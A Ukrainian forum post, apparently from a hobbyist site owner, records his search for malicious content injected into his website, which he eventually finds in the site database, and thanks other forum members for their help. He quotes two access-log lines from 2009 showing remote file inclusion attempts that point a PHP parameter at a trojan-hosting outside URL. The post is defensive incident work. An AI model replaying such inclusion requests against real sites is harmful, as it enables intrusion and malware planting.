мініщоденник дій з пошуку забороненого вмісту
---------
Щойно вкотре (здається вже вчетверте) закінчив переглядати весь вміст папки public_html, проте досі ніяких змін у скрипті сайту не виявив...
---------
Перечитуючи лог доступу я натрапив на цікаві стрічки:
Код:
212.158.163.65 - - [03/May/2009:13:46:20 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 302 289 "-" "libwww-perl/5.805"
212.158.163.65 - - [08/May/2009:13:52:48 -0400] "GET /menu.php?page=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 302 271 "-" "libwww-perl/5.805"
не раджу туди заходити, там вірус (троян)... можливо так було внесено якісь зміни до вмісту сторінки...
---------
Пане Дмитре, Ви не могли б підказати, з якого часу на моєму сайті виявлено такі зміни коду? Я гадаю то могло б трішки звузити коло пошуку. Дякую.
---------
Нарешті знайшов заборонений вміст... як не дивно, але він містився у базі даних сайту... сам код не додаю, щоб не забруднювати форум. Мені ще й досі не зрозуміло остаточно як він туди потрапив, адже для запису таких даних у базу даних необхідно мати логін та пароль мого акаунту...
Проте в будь-якому разі надалі буду намагатися виправити існуючі недоопрацювання, які могли призвести до таких наслідків.
Ще раз дякую всім небайдужим за допомогу у пошуку та знешкодженні помилки. Перепрошую, що так довго не міг виправити помилку (сильним програмістом себе не вважаю, більше того технічної освіти взагалі не маю (за освітою історик та правознавець), а програмування є більше моїм хоббі...).
Пане Дмитре, прошу Вас ще раз перевірити код сторінки на наявність забороненого вмісту, щоби я був певен чи все гаразд. Дякую.